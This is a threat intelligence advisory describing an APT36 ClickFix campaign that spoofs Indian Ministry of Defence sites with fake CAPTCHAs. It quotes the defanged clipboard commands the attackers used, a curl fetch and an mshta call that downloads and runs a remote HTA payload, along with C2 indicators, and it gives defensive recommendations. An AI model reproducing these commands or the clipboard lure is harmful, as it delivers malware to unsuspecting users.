Apt36 Leverages Clickfix Tactics In Targeted Campaign Against India

Published Date: May 14, 2025
Category: ShadowOpsIntel
Share:

A recent cyber campaign spoofing the Indian Ministry of Defence has been attributed to APT36 (aka Transparent Tribe), a Pakistan-aligned threat actor. This multi-platform attack leverages ClickFix-style social engineering and spoofed government websites to trick users into executing clipboard-delivered malware on both Windows and Linux systems. This campaign showcases a refined use of infrastructure impersonation and payload delivery tailored to specific operating systems.

Severity Level: High

ATTACK CHAIN:

  1. Reconnaissance & Infrastructure Setup:
    • Mimicry of legitimate Indian government portals (e.g., Ministry of Defence press releases).
    • Web content cloned using HTTrack (evidence in source code).
  2. Initial Access:
    • Victims visit a cloned press release portal.
  3. Delivery Mechanism:
    • Redirect to /captcha/windows.php or /captcha/linux.php based on OS.
    • Linux Flow: Fake CAPTCHA with “I’m not a rebot” button.
    • Clicking silently copies this command to clipboard:
    • curl https[:]//trade4wealth[.]in/admin/assets/js/
    • Windows Flow: Fake “For Official Use Only” overlay using blurred yoga.ayush.gov[.]in background.
    • Clicking “Continue” copies a command for mshta.exe to clipboard:
    • mshta.exe https[:]//trade4wealth[.]in/admin/assets/css/default/sysinte.hta
  4. Execution:
    • Linux:
    • Users are instructed to paste the copied command using keyboard shortcuts
    • Executes shell script mapeal.sh which opens a decoy image and ends.
  5. Windows:
    • Executing mshta loads an obfuscated HTA payload, decoded to a .NET-based loader.
    • Loader initiates outbound communication to: IP: 185.117.90[.]212 and C2: email.gov.in.avtzyu[.]store
    • A decoy press release PDF shown to reduce suspicion.
  6. Command & Control (C2):
    • Persistent connections made from obfuscated .NET loader on Windows.
    • Communication likely over HTTP(S) to the spoofed subdomain and IP.
  7. Impact (Current State):
    • Linux: No observed lateral movement, persistence, or exfiltration.
    • Windows: Loader operational; likely modular payload system for future delivery.

Recommendations:

  1. Enable HTTP/HTTPS inspection to detect HTA and shell script downloads.
  2. Train employees to recognize spoofed government portals and misleading CAPTCHAs.
  3. Educate on dangers of executing commands from clipboard.
  4. Block execution of mshta.exe where not needed.
  5. Monitor for unauthorized use of curl, wget, bash in user contexts.
  6. Block the IOCs at their respective controls. https://www.virustotal.com/gui/collection/3bb2347b4fdc81ad3263ce57a067a91cd7c214c1ab79720d55225de5a621f4be/iocs

Source:

  • https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence
  • https://www.bleepingcomputer.com/news/security/hackers-now-testing-clickfix-attacks-against-linux-targets/

Enjoyed reading this Threat Intelligence Advisory? Stay updated with our latest exclusive content by following us on Twitter and LinkedIn

No related posts found.

Ampcus Cyber
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.